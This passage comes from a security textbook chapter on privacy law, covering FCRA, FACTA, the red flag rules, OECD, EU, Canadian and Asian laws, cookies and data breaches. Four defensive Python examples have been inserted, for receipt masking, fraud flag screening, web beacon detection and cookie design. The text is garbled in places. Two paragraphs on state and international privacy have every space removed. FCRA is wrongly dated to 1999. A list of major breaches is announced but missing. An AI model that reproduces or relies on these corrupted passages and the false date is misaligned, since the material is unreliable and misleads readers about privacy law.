The Fair Credit Reporting Act of 1999 brought significant privacy protections to the consumer credit reporting agencies (CRAs). This act requires that the agencies provide consumers notice of their rights and responsibilities. The agencies are required to perform timely investigations on inaccuracies reported by consumers. The agencies are also required to notify the other CRAs when consumers close accounts. The act also has technical issues associated with data integrity, data destruction, data retention, and consumer and third-party access to data. The details of FCRA proved to be insufficient with respect to several aspects of identity theft, and in 2003, the Fair and Accurate Credit Transactions Act was passed, modifying and expanding on the privacy and security provisions of FCRA.

Tech Tip
FACTA and Credit Card Receipts
One of the provisions of FACTA compels businesses to protect credit card information on receipts. Before FACTA, it was common for receipts to have entire credit card numbers, as well as additional information. Today, receipts can display only the last five digits of the card number and cannot include the card expiration date. These rules went into effect in 2005 and merchants had one year to comply.
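The receipt rule in the Tech Tip above is one that a developer implements in the point-of-sale code and an auditor checks on printed output. The following Python is an added example, not code from the book: it masks a card number down to its last five digits, builds a receipt line that omits the expiry date, and scans receipt text for a Luhn-valid unmasked card number or an expiration date. The card numbers and receipt strings are constructed test data (Luhn-valid but not real cards), and the regular expressions and function names are this example's own.

```python
"""Receipt masking and a compliance check for the FACTA truncation rule:
at most the last five digits of the card number, and no expiration date.

Added example, not code from the book. Card numbers and receipt text are
constructed test data; the PANs pass the Luhn check but are not real cards.
"""
import re

MAX_VISIBLE_DIGITS = 5  # FACTA: no more than the last five digits on a receipt

# Constructed patterns: a run of 13-19 digits (optionally separated by single
# spaces or dashes) and an expiry written after an "EXP..." label as MM/YY or MM/YYYY.
PAN_RUN = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
EXPIRY = re.compile(r"\bEXP\w*[:\s]*(?:0[1-9]|1[0-2])/\d{2}(?:\d{2})?\b", re.IGNORECASE)


def luhn_ok(digits: str) -> bool:
    """Standard Luhn check; separates card-like digit runs from other numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Replace every digit except the last five with '*', keeping the length."""
    digits = re.sub(r"[ -]", "", pan)
    if not digits.isdigit() or not 13 <= len(digits) <= 19:
        raise ValueError("PAN must be 13-19 digits")
    return "*" * (len(digits) - MAX_VISIBLE_DIGITS) + digits[-MAX_VISIBLE_DIGITS:]


def receipt_line(pan: str, amount: str) -> str:
    """Card line for a printed receipt: masked PAN and amount, never the expiry."""
    return f"CARD {mask_pan(pan)}  AMOUNT {amount}"


def receipt_violations(text: str) -> list:
    """Return the FACTA receipt violations found in one receipt's text."""
    found = []
    for m in PAN_RUN.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):     # ignore long non-card numbers such as order ids
            found.append("unmasked card number ending " + digits[-4:])
    if EXPIRY.search(text):
        found.append("expiration date printed")
    return found


if __name__ == "__main__":
    # Constructed sample: a pre-FACTA style receipt and a compliant one.
    old_style = "VISA 4111 1111 1111 1111 EXP 09/26 TOTAL $42.10"
    compliant = receipt_line("4111111111111111", "$42.10")
    print(compliant)
    print("old receipt:", receipt_violations(old_style))
    print("new receipt:", receipt_violations(compliant))
```

The Luhn filter keeps the scanner from flagging every long digit string (order numbers, loyalty ids) as a card number, which is the usual source of noise when such a check is run over a day's receipts.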
Fair and Accurate Credit Transactions Act (FACTA)

The Fair and Accurate Credit Transactions Act of 2003 was passed to enact stronger protections for consumer information from identity theft, errors, and omissions. FACTA amended portions of FCRA to improve the accuracy of customer records in consumer reporting agencies, to improve timely resolution of consumer complaints concerning inaccuracies, and to make businesses take reasonable steps to protect information that can lead to identity theft.

Tech Tip
FTC Disposal Rule
The FTC's Disposal Rule applies to consumer reporting agencies as well as to any individuals and businesses that use consumer reports, such as lenders, insurers, employers, and landlords.

FACTA also had other "disposal rules" associated with consumer information. FACTA mandates that information that is no longer needed must be properly disposed of, either by burning, pulverizing, or shredding. Any electronic information must be irreversibly destroyed or erased. Should third-party firms be used for disposal, the rules still pertain to the original contracting party, so third parties should be selected with care and monitored for compliance.

Tech Tip
Red Flag Rules
The FTC has adopted a set of red flag rules that are invoked to assist entities in determining when extra precautions must be taken concerning PII records. The following are some examples of red flags that should prompt an organization to initiate additional, specific data-handling steps to protect data:
Change of address request. This is a common tool for identity thieves, and as such, firms should provide protection steps to verify change of address requests.
Sudden use of an account that has been inactive for a long time, or radical changes in use of any account.
A suspicious address or phone number. Many fraudulent addresses and numbers are known, and repeated applications should be quickly noted and stopped.
Request for credit on a consumer account that has a credit freeze on a credit reporting record.
Additional information is available from the FTC at www.ftc.gov/tips-advice/business-center/guidance/fighting-identity-theft-red-flags-rule-how-guide-business. Whenever a red flag issue occurs, the business must have special procedures in place to ensure that the event is not fraudulent. Calling the customer and verifying information before taking action is one example of this type of additional action.
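The four red flags in the Tech Tip above can be screened for automatically so that flagged events are held for the out-of-band verification the text describes. The Python below is an added example, not code from the book or the FTC: it evaluates each incoming account event against those four flags and lists the events that need a verification call before being acted on. The dormancy threshold (365 days), the "radical change" factor (five times the customer's average amount), the known-bad contact list, and the account and event records are all constructed assumptions.

```python
"""Screen account events for the FTC red flags listed above.

Added example, not from the book or the FTC. The thresholds, the known-bad
contact list and the account/event records are constructed assumptions.
"""
from dataclasses import dataclass
from datetime import date

DORMANT_DAYS = 365          # assumption: no activity for this long means "dormant"
RADICAL_CHANGE_FACTOR = 5   # assumption: an amount over 5x the usual average is "radical"

# Constructed: contact details seen on earlier fraudulent applications.
KNOWN_BAD_ADDRESSES = {"1 drop ave, nowhere"}
KNOWN_BAD_PHONES = {"5550100"}          # stored digits-only, see normalize_phone


@dataclass
class Account:
    account_id: str
    last_activity: date      # snapshot taken before the events below are processed
    average_amount: float
    credit_freeze: bool = False


@dataclass
class Event:
    event_id: str
    account_id: str
    kind: str                # "transaction", "address_change" or "credit_request"
    when: date
    amount: float = 0.0
    new_address: str = ""
    new_phone: str = ""


def normalize_phone(phone: str) -> str:
    """Keep only the digits so formatting differences do not defeat the lookup."""
    return "".join(ch for ch in phone if ch.isdigit())


def red_flags(account: Account, event: Event) -> list:
    """Return the names of the red flags raised by one event on one account."""
    flags = []
    if event.kind == "address_change":
        flags.append("change_of_address_request")
    if (event.when - account.last_activity).days > DORMANT_DAYS:
        flags.append("dormant_account_activity")
    if (event.kind == "transaction" and account.average_amount > 0
            and event.amount > RADICAL_CHANGE_FACTOR * account.average_amount):
        flags.append("radical_change_in_use")
    if (event.new_address.strip().lower() in KNOWN_BAD_ADDRESSES
            or normalize_phone(event.new_phone) in KNOWN_BAD_PHONES):
        flags.append("suspicious_contact_info")
    if event.kind == "credit_request" and account.credit_freeze:
        flags.append("credit_request_on_frozen_file")
    return flags


def triage(accounts: dict, events: list) -> dict:
    """Map every event id to its red flags (an empty list means no flag)."""
    return {e.event_id: red_flags(accounts[e.account_id], e) for e in events}


def needs_verification(accounts: dict, events: list) -> list:
    """Event ids that must be verified with the customer before being acted on."""
    return [eid for eid, flags in triage(accounts, events).items() if flags]


# Constructed sample data.
ACCOUNTS = {
    "A1": Account("A1", date(2014, 1, 15), 40.0),                    # dormant since 2014
    "A2": Account("A2", date(2015, 11, 2), 120.0, credit_freeze=True),
    "A3": Account("A3", date(2015, 11, 20), 60.0),
}
EVENTS = [
    Event("e1", "A1", "transaction", date(2015, 12, 1), amount=55.0),
    Event("e2", "A2", "credit_request", date(2015, 12, 1)),
    Event("e3", "A3", "address_change", date(2015, 12, 1),
          new_address="1 Drop Ave, Nowhere", new_phone="(555) 010-0"),
    Event("e4", "A3", "transaction", date(2015, 12, 2), amount=65.0),
    Event("e5", "A3", "transaction", date(2015, 12, 3), amount=900.0),
]

if __name__ == "__main__":
    for eid, flags in triage(ACCOUNTS, EVENTS).items():
        print(eid, flags or "ok")
    print("hold for customer call-back:", needs_verification(ACCOUNTS, EVENTS))
```

Each flag is evaluated independently, so one event can carry several; the holding list is what a fraud team would work through with call-backs, the "additional action" the text gives as its example.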
Non-FederalPrivacyConcernsintheUnitedStates
Despitethewideassortmentoffederalstatutesassociatedwithprivacy,asignificantgapremainsinprivacyprotectionintheUnitedStates.Governmentinformationaboutitscitizensisnotlimitedtojustthefederalgovernment.Stateandlocalgovernmentsalsohavesignificantinformationholdingsassociatedwithindividuals.Infact,itisnotuncommonforthequantityanddetailofinformationtoincreaseasproximitytoindividualsincreases.Localgovernmentshavesignificantquantitiesofgovernment-compiledpersonalinformation(suchaspropertyownership,courtrecords,voterregistration,fictitiousbusinessnames,vitalrecords,andsoforth).
Onlyabouthalfthestateshavesimilarprivacyactsconcerningstategovernmentagencies’handlingofpersonalinformation.InCalifornia,thisstatuteistheInformationPracticesAct.Eachstatethathassuchprotectionprovisionsdoessounderitsownsetofrulesandregulations,creatingapatchworkapproachtothistopic.Inonlyahandfulofstatesdoesthestate’s“privacyact”extendtolocalgovernment,where,asalreadynoted,existsthelion’sshareofinformation.ThislackofunifiedtreatmenthasplacedtheUnitedStatesbehindmanyothernationswithrespecttothisissueandhascreatedsafeharborissuesthatregularlyrequiretimeandefforttoaddressatthehighestlevelsofgovernment,withadifferingsetofofficialsinvolveddependinguponthesourceoftheinformation.Safeharborrulesareaseriesofagreementstoprivacyhandlingacrossinternationalboundaries.Forexample,ifprivacyconcernsarisefromtravelissues,theDepartmentofHomelandSecuritywouldrespond;forfinancialtransactionprivacyissues,itwouldbetheTreasuryDepartment;andforexportandimport,itwouldbetheCommerceDepartment.Thischannel-dependentresponsibilitycomplicatesnegotiationsoverissuesastheU.S.governmentagencyresponsibleforprivacyisalwayschangingasthesourceoftheprivacyissuechanges.
InternationalPrivacyLawsPrivacyisnotaU.S.-centricphenomenon,butitdoeshavestrongculturalbiases.Legalprotectionsforprivacytendtofollowthesocio-culturalnormsbygeography;hence,therearedifferentpoliciesinEuropeannationsthanintheUnitedStates.IntheUnitedStates,theprimarypathtoprivacyisviaopt-out,whereasinEuropeandothercountries,itisviaopt-in.Whatthismeansisthatthefundamentalnatureofcontrolshifts.IntheU.S.,aconsumermustnotifyafirmthattheywishtoblockthesharingofpersonalinformation;otherwisethefirmhaspermissionbydefault.IntheEU,sharingisblockedunlessthecustomerspecificallyoptsintoallowit.TheFarEasthassignificantlydifferentculturalnormswithrespecttoindividualismvs.collectivism,andthisisseenintheirprivacylawsas
well.Evenincountrieswithcommonborders,distinctdifferencesexist,suchastheUnitedStatesandCanada;CanadianlawsandcustomshavestrongrootstotheirUKhistory,andinmanycasesfollowEuropeanidealsasopposedtoU.S.ones.OneoftheprimarysourcesofintellectualandpoliticalthoughtonprivacyhasbeentheOrganizationforEconomicCo-operationandDevelopment(OECD).Thismultinationalentityhasfordecadesconductedmultilateraldiscussionsandpolicyformationonawiderangeoftopics,includingprivacy.
OECD Fair Information Practices
OECD Fair Information Practices are the foundational element for many worldwide privacy practices. Dating to 1980, Fair Information Practices are a set of principles and practices that set out how an information-based society may approach information handling, storage, management, and flows with a view toward maintaining fairness, privacy, and security. Members of the OECD recognized that information was a critical resource in a rapidly evolving global technology environment, and that proper handling of this resource was critical for long-term sustainability of growth.
Tech Tip: OECD's Privacy Code
OECD's privacy code was developed to help "harmonise national privacy legislation and, while upholding such human rights, [to] at the same time prevent interruptions in international flows of data. [The Guidelines] represent a consensus on basic principles which can be built into existing national legislation, or serve as a basis for legislation in those countries which do not yet have it." (Source: "OECD Guidelines on the Protection of Privacy and Transborder Flows of Personal Data," www.oecd.org/sti/ieconomy/oecdguidelinesontheprotectionofprivacyandtransborderflowsofpersonaldata.htm)
European Laws
The EU has developed a comprehensive concept of privacy, which is administered via a set of statutes known as data protection. These privacy statutes cover all personal data, whether collected and used by government or by private firms. These laws are administered by state and national data protection agencies in each country. With the advent of the EU, this common comprehensiveness stands in distinct contrast to the patchwork of laws in the United States. Privacy laws in Europe are built around the concept that privacy is a fundamental human right that demands protection through government administration. When the EU was formed, many laws were harmonized across the original 15 member nations, and data privacy was among those standardized. One important aspect of this harmonization is the Data Protection Directive, adopted by EU members, which has a provision allowing the European Commission to block transfers of personal data to any country outside the EU that has been determined to lack adequate data protection policies. The impetus for the EU directive is to establish the regulatory framework to enable the movement of personal data from one country to another, while at the same time ensuring that privacy protection is "adequate" in the country to which the data is sent. This can be seen as a direct result of the early HEW task force (see "U.S. Privacy Laws," earlier in the chapter) and OECD directions. If the recipient country has not established a minimum standard of data protection, it is expected that the transfer of data will be prohibited.
Tech Tip: Safe Harbor Principles
Safe Harbor is built upon seven principles:
Notice: A firm must give notice of what is being collected, how it will be used, and with whom it will be shared.
Choice: A firm must allow the option to opt out of transfer of PII to third parties.
Onward Transfer: All disclosures of PII must be consistent with the previous principles of Notice and Choice.
Security: PII must be secured at all times.
Data Integrity: PII must be maintained accurately and, if incorrect, the customer has the right to correct it.
Access: Individuals must have appropriate and reasonable access to PII for the purposes of verification and correction.
Enforcement: Issues with privacy and PII must have appropriate enforcement provisions to remain effective.
See www.export.gov/safeharbor/eg_main_018236.asp for more information.
The differences in approach between the U.S. and the EU with respect to data protection led the EU to issue expressions of concern about the adequacy of data protection in the United States, a move that could have paved the way to the blocking of data transfers. After negotiation, it was determined that U.S. organizations that voluntarily joined an arrangement known as Safe Harbor would be considered adequate in terms of data protection. Safe Harbor is a mechanism for self-regulation that can be enforced through trade practice law via the FTC. A business joining the Safe Harbor Consortium must make commitments to abide by specific guidelines concerning privacy. Safe Harbor members also agree to be governed by certain self-enforced regulatory mechanisms, backed ultimately by FTC action.
Tech Tip: Encryption and Privacy
Encryption has long been held by governments to be a technology associated with the military. As such, different governments have regulated it in different manners. The U.S. government has greatly reduced controls over encryption in the past decade. Other countries, such as Great Britain, have enacted statutes that compel users to turn over encryption keys when asked by authorities. Countries such as France, Malaysia, and China still tightly control and license end-user use of encryption technologies. The primary driver for Phil Zimmermann to create Pretty Good Privacy (PGP) was the need for privacy in countries where the government was considered a threat to civil liberties.
Another major difference between U.S. and European regulation lies in where the right of control is exercised. In European directives, the right of control over privacy is balanced in such a way as to favor consumers. Rather than having to pay to opt out, as with unlisted phone numbers in the United States, consumers have such services for free. Rather than having to opt out at all, the default privacy setting is deemed to be the highest level of data privacy, and users have to opt in to share information. This default setting is a cornerstone of the European Union's Directive on Protection of Personal Data and is enforced through national laws in all member nations.
Canadian Laws
Like many European countries, Canada has a centralized form of privacy legislation that applies to every organization that collects, uses, or discloses personal information, including information about employees. These regulations stem from the Personal Information Protection and Electronic Data Act (PIPEDA), which requires that personal information be collected and used only for appropriate purposes. Individuals must be notified as to why the information is requested and how it will be used. The act has safeguards associated with storage, use, reuse, and retention. To ensure leadership in the field of privacy issues, Canada has a national-level privacy commissioner and each province has a province-level privacy commissioner. These commissioners act as advocates on behalf of individuals and have used legal actions to enforce the privacy provisions associated with PIPEDA to protect personal information.
Asian Laws
Japan has a Personal Information Protection Law that requires protection of personal information used by the Japanese government, third parties, and the public sector. The Japanese law has provisions where the government entity must specify the purpose for which information is being collected, specify the safeguards applied, and, when permitted, discontinue use of the information upon request. Hong Kong has an office of the Privacy Commissioner for Personal Data (PCPD), a statutory body entrusted with the task of protecting the personal data privacy of individuals and ensuring compliance with the Personal Data (Privacy) Ordinance in Hong Kong. One main task of the Commissioner is public education, creating greater awareness of privacy issues and the need to comply with the Personal Data Ordinance. China has had a long reputation of poor privacy practices. Some of this comes from the cultural bias toward collectivism, and some comes from the long-standing government tradition of surveillance. Recent news of the Chinese government eavesdropping on Skype and other Internet-related communications has heightened this concern. China's constitution has provisions for privacy protections for the citizens. Even so, issues have arisen in the areas of enforcement and penalties, and privacy matters have been far from uniform in their judicial history.
Privacy-Enhancing Technologies
One principal connection between information security and privacy is that without information security, you cannot have privacy. If privacy is defined as the ability to control information about oneself, then the aspects of confidentiality, integrity, and availability from information security become critical elements of privacy. Just as technology has enabled many privacy-impacting issues, technology also offers the means in many cases to protect privacy. An application or tool that assists in such protection is called a privacy-enhancing technology (PET). Encryption is at the top of the list of PETs for protecting privacy and anonymity. As noted earlier, one of the driving factors behind Phil Zimmermann's invention of PGP was the desire to enable people living in repressive cultures to communicate safely and freely. Encryption can keep secrets secret, and is a prime choice for protecting information at any stage in its life cycle. The development of Tor routing to permit anonymous communications, coupled with high-assurance, low-cost cryptography, has made many web interactions securable and safe from eavesdropping. Other PETs include small application programs, called cookie cutters, that are designed to prevent the transfer of cookies between browsers and web servers. Some cookie cutters block all cookies, while others can be configured to selectively block certain cookies. Some cookie cutters also block the sending of HTTP headers that may reveal personal information but may not be necessary to access a website, and some block banner ads, pop-up windows, animated graphics, or other unwanted web elements. Some related PET tools are designed specifically to look for invisible images that set cookies (called web beacons or web bugs). Other PETs are available to PC users, including encryption programs that allow users to encrypt and protect their own data, even on USB keys.
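The two cookie-cutter behaviors described above, flagging web beacons and withholding identifying HTTP headers from third-party requests, as an added example written for this edit (it is not code from the book or from any particular PET product). The sample page, the host names (example-shop.test, adnet-example.test) and the request headers are constructed; the heuristic for a beacon is an image that is either a 1x1 pixel or styled invisible, which is the classic web-bug shape.

```python
"""Added example, not from the book: a minimal cookie-cutter-style filter.
It (1) flags likely web beacons (invisible tracking images) in a page and
(2) strips request headers that could reveal personal information when a
resource is fetched from a third-party host. Page, hosts and headers are
constructed for illustration."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a visible banner, a third-party 1x1 tracking pixel,
# a hidden first-party image, and a visible relative-path logo.
SAMPLE_HTML = """
<html><body>
<img src="https://www.example-shop.test/img/banner.png" width="600" height="90">
<img src="https://track.adnet-example.test/pixel.gif?uid=12345" width="1" height="1">
<img src="https://metrics.example-shop.test/b.gif" style="display: none">
<img src="/img/logo.png" width="120" height="40">
</body></html>
"""


def same_site(host, first_party):
    """True if host is the first-party domain itself or one of its subdomains."""
    host, first_party = host.lower(), first_party.lower()
    return host == first_party or host.endswith("." + first_party)


class BeaconFinder(HTMLParser):
    """Collects <img> tags that look like web beacons: 1x1 pixels or hidden images."""

    def __init__(self, first_party):
        super().__init__()
        self.first_party = first_party
        self.beacons = []  # list of (src, reason)

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        reasons = []
        if a.get("width") == "1" and a.get("height") == "1":
            reasons.append("1x1 pixel")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden")
        if not reasons:
            return  # an ordinary, visible image
        host = urlparse(src).hostname
        if host and not same_site(host, self.first_party):
            reasons.append("third-party host " + host)
        self.beacons.append((src, ", ".join(reasons)))


def find_web_beacons(html, first_party):
    """Return [(src, reason), ...] for images in html that look like beacons."""
    finder = BeaconFinder(first_party)
    finder.feed(html)
    finder.close()
    return finder.beacons


# Headers withheld from third-party requests: they reveal where the user came
# from (Referer) or who the user is (Cookie) without being needed for the fetch.
LEAKY_HEADERS = {"cookie", "referer"}


def scrub_request_headers(headers, request_url, first_party):
    """Drop identifying headers when the request leaves the first-party site."""
    host = urlparse(request_url).hostname or ""
    if same_site(host, first_party):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in LEAKY_HEADERS}


if __name__ == "__main__":
    for src, why in find_web_beacons(SAMPLE_HTML, "example-shop.test"):
        print("beacon:", src, "(" + why + ")")
    hdrs = {"User-Agent": "ExampleBrowser/1.0",
            "Referer": "https://www.example-shop.test/cart",
            "Cookie": "session=abc"}
    print(scrub_request_headers(hdrs, "https://track.adnet-example.test/pixel.gif",
                                "example-shop.test"))
```

Run against the constructed page, the finder reports the third-party 1x1 pixel and the hidden first-party image and leaves the two visible images alone; the header scrubber keeps all headers for same-site fetches and drops Cookie and Referer for the tracking host. A real cookie cutter would sit in the request path rather than parse a saved page, but the decision logic is the same.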
Privacy Policies
One of the direct outcomes of the legal statutes associated with privacy has been the development of a need for corporate privacy policies associated with data collection. With a myriad of government agencies involved, each with a specific mandate to "assist" in the protection effort associated with PII, one can ask, what is the best path for an industry member? If your organization needs PII to perform its tasks, obtaining and using it is fine in most cases, but you must ensure that everyone in the organization complies with the acts, rules, and regulations associated with these government agencies. Policies and procedures are the best way to ensure uniform compliance across an organization. The development of a privacy policy is an essential foundational element of a company's privacy stance.
Tech Tip: Privacy Compliance Steps
To ensure that an organization complies with the numerous privacy requirements and regulations, a structured approach to privacy planning and policies is recommended:
1. Identify the role in the organization that will be responsible for compliance and oversight.
2. Document all applicable laws and regulations, industry standards, and contract requirements.
3. Identify any industry best practices.
4. Perform a privacy impact assessment (PIA) and a risk assessment.
5. Map the identified risks to compliance requirements.
6. Create a unified risk mitigation plan.
Privacy Impact Assessment
A privacy impact assessment (PIA) is a structured approach to determining the gap between desired privacy performance and actual privacy performance. A PIA is an analysis of how PII is handled through business processes and an assessment of risks to the PII during storage, use, and communication. A PIA provides a means to assess the effectiveness of a process relative to compliance requirements and identify issues that need to be addressed. A PIA is structured with a series of defined steps to ensure a comprehensive review of privacy provisions. The following steps comprise a high-level methodology and approach for conducting a PIA:
1. Establish PIA scope. Determine the departments involved and the appropriate representatives. Determine which applications and business processes need to be assessed. Determine applicable laws and regulations associated with the business and privacy concerns.
2. Identify key stakeholders. Identify all business units that use PII. Examine staff functions such as HR, Legal, IT, Purchasing, and Quality Control.
3. Document all contact with PII:
   PII collection, access, use, sharing, and disposal
   Processes and procedures, policies, safeguards, data-flow diagrams, and any other risk assessment data
   Website policies, contracts, HR, and administrative sources of other PII
4. Review legal and regulatory requirements, including any upstream contracts. The sources are many, but some commonly overlooked issues are agreements with suppliers and customers over information sharing rights.
5. Document gaps and potential issues between requirements and practices. All gaps and issues should be mapped against where the issue was discovered and the basis (requirement or regulation) that the gap maps to.
6. Review findings with key stakeholders to determine accuracy and clarify any issues. Before the final report is written, any issues or possible miscommunications should be clarified with the appropriate stakeholders to ensure a fair and accurate report.
7. Create the final report for management.
Web Privacy Issues
The Internet acts as a large information-sharing domain, and as such can be a conduit for the transference of information among many parties. The Web offers much in the form of communication between machines, people, and systems, and this same exchange of information can be associated with privacy based on the content of the information and the reason for the exchange.
Cookies
Cookies are small bits of text that are stored on a user's machine and sent to specific websites when the user visits. Cookies can store many different things, from tokens that provide a reference to a database server behind the web server to assist in maintaining state through an application, to the contents of a shopping cart. Cookies can also hold data directly, in which case there are possible privacy implications. When a cookie holds a token number that is meaningless to outsiders but meaningful to a back-end server, then the loss of the cookie represents no loss of personal information at all. When the cookie text contains meaningful information, then the loss can result in privacy issues. For instance, when a cookie contains a long number that has no meaning except to the database server, then the number has no PII. But if the cookie contains text, such as a ship-to address for an order, this can represent PII and can result in a privacy violation. It is common to encode the data in cookies, but Base64 encoding is not encryption and can be decoded by anyone, thus providing no confidentiality. Cookies provide a useful service of allowing state to be maintained in a stateless process, web serving (see "Cookies" in Chapter 17). But because of the potential for PII leakage, many users have sworn off cookies. This leads to issues on numerous websites, for when properly implemented, cookies pose no privacy danger and can greatly enhance website usefulness. The bottom line for cookies is fairly easy—done correctly, they do not represent a security or privacy issue. Done incorrectly, they can be a disaster. A simple rule solves most problems with cookies: never store data directly in a cookie; instead, store a reference to another web application that permits the correct actions to occur based on the key value.
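The two cookie designs the passage contrasts, as an added example written for this edit (not code from the book): a cookie that carries the ship-to record itself, merely Base64-encoded, beside a cookie that carries only a random key resolved by a server-side store. The order record, the SessionStore class and the cookie_exposes_data review check are all constructed for illustration; a framework's real session middleware implements the same reference pattern with persistent storage.

```python
"""Added example, not from the book: the two cookie designs contrasted in the
text. A "data" cookie carries Base64-encoded PII, which anyone holding the
cookie can decode; a "reference" cookie carries only an unguessable key whose
meaning lives in a server-side store. The order record is constructed."""
import base64
import json
import secrets

# Constructed PII that a careless application might place in a cookie.
ORDER = {"name": "A. Customer", "ship_to": "1 Example Street, Sampletown"}


def make_data_cookie(record):
    """Unsafe pattern: the record itself goes into the cookie, merely encoded."""
    return base64.b64encode(json.dumps(record).encode("utf-8")).decode("ascii")


def read_data_cookie(value):
    """Encoding is not encryption: anyone holding the cookie recovers the PII."""
    return json.loads(base64.b64decode(value).decode("utf-8"))


class SessionStore:
    """Safe pattern: the cookie is a random key; the PII stays server-side."""

    def __init__(self):
        self._records = {}

    def make_reference_cookie(self, record):
        token = secrets.token_urlsafe(32)  # 256 bits of randomness, unguessable
        self._records[token] = dict(record)
        return token

    def resolve(self, token):
        """Look up the record for a token; an unknown token yields None."""
        return self._records.get(token)


def cookie_exposes_data(value):
    """Review heuristic: does the cookie value decode to structured data?
    A reference token fails to decode; a Base64-wrapped JSON record succeeds."""
    try:
        raw = base64.b64decode(value, validate=True)
        return isinstance(json.loads(raw.decode("utf-8")), (dict, list))
    except ValueError:  # binascii.Error, UnicodeDecodeError, JSONDecodeError
        return False


if __name__ == "__main__":
    data_cookie = make_data_cookie(ORDER)
    print("data cookie:", data_cookie)
    print("decoded by anyone:", read_data_cookie(data_cookie))
    store = SessionStore()
    ref_cookie = store.make_reference_cookie(ORDER)
    print("reference cookie:", ref_cookie)
    print("resolved server-side:", store.resolve(ref_cookie))
    print("exposes data?", cookie_exposes_data(data_cookie), cookie_exposes_data(ref_cookie))
```

The reference cookie is still a bearer credential (whoever holds it can act as the session), so it is protected by transport encryption and cookie attributes rather than by being secret in content; the point of the rule is that losing it never leaks the PII itself. The cookie_exposes_data check is the kind of test a reviewer can run over captured Set-Cookie values to find cookies that violate the rule.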
Privacy in Practice
With privacy being defined as the power to control what others know about you and what they can do with that information, there remains the question of what you can do to exercise that control. Information is needed to obtain services, and in many cases the information is reused, often for additional and secondary purposes. Users agree to these uses through acceptance of a firm's privacy policy. Shared information still requires control, and in this case the control function has shifted to the party that obtained the information. They may store it for future use, for record purposes, or for other uses. If they fail to adequately protect the information from loss or disclosure, then the owner has not authorized the uses to which it may be put. Data disclosures and information thefts both result in unauthorized use of information. Users can take actions both to protect their information and to mitigate risk from unauthorized sharing and use of their information.
User Actions
Users have to share information for a variety of legitimate purposes. Information has value, both to the authorized user and to those who would steal the information and use it for unauthorized purposes. If users are going to control their information, they have to take certain precautions. This is where security and privacy intersect at an operational level. Security functionality enables control and thus enables privacy functionality. One aspect of maintaining control over information is in the proper security precautions presented throughout the book, so they will not be repeated here. A second level of actions can be employed by users to maintain knowledge of how their information is used. The value of information is in its use, and in many cases, this use can be tracked. The two main types of information that have immediate value are financial and medical. Financial information, such as credit card information, identity information, and banking information, can be used by criminals to steal from others. Many times the use of identity or financial information will show up on the systems of record associated with the information. This is why it is important to actually read bank statements and verify charges.
Users should periodically, as in annually, request copies of their credit bureau reports and examine them for unauthorized activity. Likewise, users should periodically verify with their healthcare insurers, looking for unauthorized activity there as well. These checks do not take much time and provide a means to prevent long-term penetration of identities.
In the same vein, one should periodically examine their credit report, looking for unauthorized credit requests or accounts. Periodic checks of healthcare insurance accounts and reports are essential for the same reason. Even if you have paid all your copays, you shouldn't shred unopened envelopes from the insurance company. If someone else is using your information, you may be authorizing their use of your stolen information by not alerting the insurance company to the misuse.
Data Breaches
When a company loses data that it has stored on its network, the event is termed a data breach. Data breaches have become an almost daily news item, with people actually becoming desensitized to their occurrence. Data breaches act as a means of notification that security efforts have failed. Verizon regularly publishes a data breach investigation report, examining the root causes behind hundreds of breach events. In the 2014 report, Verizon found that nine out of ten breaches can be described by the following nine distinct patterns:
Point-of-sale (POS) intrusions
Web app attacks
Insider and privilege misuse
Physical theft and loss
Miscellaneous errors (misdelivery, misconfiguration, user errors)
Crimeware
Payment card skimmers
Denial of service
Cyber espionage
In 2014, over 63,000 security incidents were analyzed, with 1367 confirmed data breaches across 95 countries.
2014 and into 2015 was a banner time for data breaches. The major breaches include:
Other major incidents include the Korean Credit Bureau breach, involving 20 million records in a country of 50 million people. Possibly the biggest news was the third breach of Sony, this time not just the PlayStation network, but virtually all corporate records associated with Sony Pictures Entertainment, the film studio subsidiary. Embarrassing e-mails, PII for employees, scripts…the content released was widespread, including that on contractor machines.
Chapter 25 Review
For More Information
Rebecca Herold, Privacy Professor
Monthly Privacy Professor Tips: www.privacyguidance.com/eTips.html
Blog: www.privacyguidance.com/blog/
Videos: www.privacyguidance.com/eMy_Videos.html
Data Breaches
Information is Beautiful (visualizations): www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Verizon Data Breach Investigations Report: www.verizonenterprise.com/DBIR
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following aspects of privacy.
Define privacy
Privacy is the power to control what others know about you and what they can do with that information.
The concept of privacy does not translate directly to information about a business, as it is not about a person.
Identify privacy laws relative to computer security in various industries
Numerous U.S. federal statutes have privacy provisions, including FERPA, VPPA, GLBA, HIPAA, and so on.
The number of state and local laws that address privacy issues is limited.
A wide array of international laws address privacy issues, including those of the EU, Canada, and other nations.
Describe issues associated with technology and privacy
A direct relationship exists between information security and privacy—one cannot have privacy without security.
Privacy-enhancing technologies (PETs) are used in the technological battle to preserve anonymity and privacy.
Explain the concept of personally identifiable information (PII)
Specific constituent elements of PII need to be protected.
Corporate responsibilities associated with PII include the need to protect PII appropriately when in storage, use, or transmission.
Craft a privacy policy for online records
Policies drive corporate actions, and privacy policies are required by several statutes and are essential to ensure compliance with the myriad of mandated actions.
Recognize web-related privacy issues
Cookies represent a useful tool to maintain state when surfing the Web, but if used incorrectly, they can represent a security and privacy risk.
Key Terms
